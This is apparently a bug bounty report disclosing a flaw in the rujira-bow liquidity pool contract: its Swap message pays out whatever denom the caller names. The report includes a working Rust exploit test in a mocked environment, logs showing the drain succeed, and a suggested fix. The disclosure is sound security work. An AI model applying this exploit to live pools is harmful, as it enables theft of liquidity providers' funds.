### ISSUE TITLE
BOW Swap Pays Arbitrary Caller-Specified Denom Allowing Liquidity Theft

### ISSUE THREAD

**Issue by c4-bot-10** [code-423n4/rujira-bug-bounty#3]
# Lines of code

https://github.com/thorchain/rujira/-/blob/0fb88acfed58d82f17b2de6ad0c13e3c7a9d50c1/contracts/rujira-bow/src/contract.rs#L50-L78

# Vulnerability details

## Finding Description and Impact

ExecuteMsg::Swap accepts a min_return coin from the caller, passes it unchanged into strategy.validate_swap for amount checking, and then forwards that same coin via BankMsg::Send (or callback) as the payout. The strategy code validates only the numeric amount and never enforces that the denom matches the counter-asset implied by the offered token. As a result, a trader can offer asset A, set min_return to the expected numeric return but pick any denom (including asset A again or an unrelated token), and receive that denomination from the pool. Because BOW pools usually hold both sides of the pair, an attacker can repeatedly drain whichever side they choose. With differing decimals (e.g., 8 vs 6), the mismatch can even amplify the theft. This is a direct loss of LP funds and qualifies as Critical.

## Proof of Concept

```rust
#[test]
fn swap_allows_denom_mismatch_theft() {
    let mut app = mock_rujira_app();
    let owner = app.api().addr_make("owner");
    let attacker = app.api().addr_make("attacker");

    app.init_modules(|router, _api, storage| {
        router
            .bank
            .init_balance(
                storage,
                &owner,
                vec![coin(10_000_000_000_000, "ruji"), coin(10_000_000_000, "usdc")],
            )
            .unwrap();
        router
            .bank
            .init_balance(storage, &attacker, vec![coin(5_000_000, "usdc")])
            .unwrap();
    });

    let code = Box::new(ContractWrapper::new(execute, instantiate, query));
    let code_id = app.store_code(code);
    let contract = app
        .instantiate_contract(
            code_id,
            owner.clone(),
            &InstantiateMsg {
                metadata: TokenMetadata {
                    description: "RUJI-USDC XYK Liquidity Pool Token".to_string(),
                    display: "LP RUJI-USDC".to_string(),
                    name: "LP RUJI-USDC".to_string(),
                    symbol: "LP/RUJI-USDC".to_string(),
                    uri: None,
                    uri_hash: None,
                },
                strategy: Strategies::Xyk(Xyk::new(
                    "ruji".to_string(),
                    "usdc".to_string(),
                    Decimal::permille(1u64),
                    Uint128::from(Xyk::MIN_MIN_QUOTE),
                    Decimal::zero(),
                )),
            },
            &[],
            "template",
            None,
        )
        .unwrap();

    app.execute_contract(
        owner,
        contract.clone(),
        &ExecuteMsg::Deposit {
            min_return: Some(Uint128::from(1_000_000_000u128)),
            callback: None,
        },
        &[
            coin(10_000_000_000_000, "ruji"),
            coin(10_000_000_000, "usdc"),
        ],
    )
    .unwrap();

    let StrategyResponse::Xyk((_strategy, state)) = app
        .wrap()
        .query_wasm_smart(contract.clone(), &QueryMsg::Strategy {})
        .unwrap();

    let contract_usdc_before = app
        .wrap()
        .query_balance(contract.clone(), "usdc")
        .unwrap()
        .amount;
    let contract_ruji_before = app
        .wrap()
        .query_balance(contract.clone(), "ruji")
        .unwrap()
        .amount;

    let offer_amount = Uint128::from(5_000_000u128);
    let mut simulated_state = state.clone();
    simulated_state.invert();
    let return_amount_total = simulated_state.swap(&offer_amount).unwrap();
    let fee_amount = return_amount_total.multiply_ratio(1u128, 1000u128);
    let expected_return = return_amount_total.checked_sub(fee_amount).unwrap();

    let attacker_before = app
        .wrap()
        .query_balance(attacker.clone(), "usdc")
        .unwrap();

    app.execute_contract(
        attacker.clone(),
        contract.clone(),
        &ExecuteMsg::Swap {
            min_return: coin(expected_return.u128(), "usdc"),
            to: None,
            callback: None,
        },
        &[coin(offer_amount.u128(), "usdc")],
    )
    .unwrap();

    let attacker_after = app
        .wrap()
        .query_balance(attacker, "usdc")
        .unwrap();

    assert!(
        attacker_after.amount > attacker_before.amount,
        "attacker did not profit"
    );

    let attacker_profit = attacker_after
        .amount
        .checked_sub(attacker_before.amount)
        .unwrap();
    assert!(
        attacker_profit > Uint128::zero(),
        "profit should be strictly positive"
    );

    let contract_usdc_after = app
        .wrap()
        .query_balance(contract.clone(), "usdc")
        .unwrap()
        .amount;
    let contract_ruji_after = app
        .wrap()
        .query_balance(contract, "ruji")
        .unwrap()
        .amount;

    let contract_loss = contract_usdc_before
        .checked_sub(contract_usdc_after)
        .unwrap();
    assert_eq!(contract_loss, attacker_profit);
    assert_eq!(contract_ruji_after, contract_ruji_before);
}
```

### Explanation and results

The test seeds a RUJI/USDC pool, then has the attacker offer 5,000,000 USDC while requesting the calculated return amount (≈4,970,149,254 units) in USDC instead of RUJI. Because the contract never checks the denom, it sends back USDC straight from the pool. The assertions confirm the attacker's balance increases exactly by the amount the pool loses, while the RUJI reserve remains unchanged—demonstrating the drain.

### Command logs

```bash
RUSTUP_HOME=$PWD/.rustup CARGO_HOME=$PWD/.cargo cargo test -p rujira-bow -j 1
```

```
newuser@LAPTOP-MLPJMQD2:~/rujira-bug-bounty/rujira-main$ RUSTUP_HOME=$PWD/.rustup CARGO_HOME=$PWD/.cargo cargo test -p rujira-bow -j 1
    Finished `test` profile [unoptimized + debuginfo] target(s) in 0.09s
     Running unittests src/lib.rs (target/debug/deps/rujira_bow-61b205c5659f4056)

running 4 tests
test config::tests::validation ... ok
test contract::tests::instantiation ... ok
test contract::tests::deposit_withdraw ... ok
test contract::tests::swap_allows_denom_mismatch_theft ... ok

test result: ok. 4 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out; finished in 0.00s

     Running unittests src/bin/schema.rs (target/debug/deps/schema-14c42df1fa4a7072)

running 0 tests

test result: ok. 0 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out; finished in 0.00s

   Doc-tests rujira_bow

running 0 tests

test result: ok. 0 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out; finished in 0.00s
```

## Recommended Mitigation Steps

- Derive the payout denom from the strategy output instead of trusting user input. Ensure the returned denom corresponds to the counter-asset for the offered token.
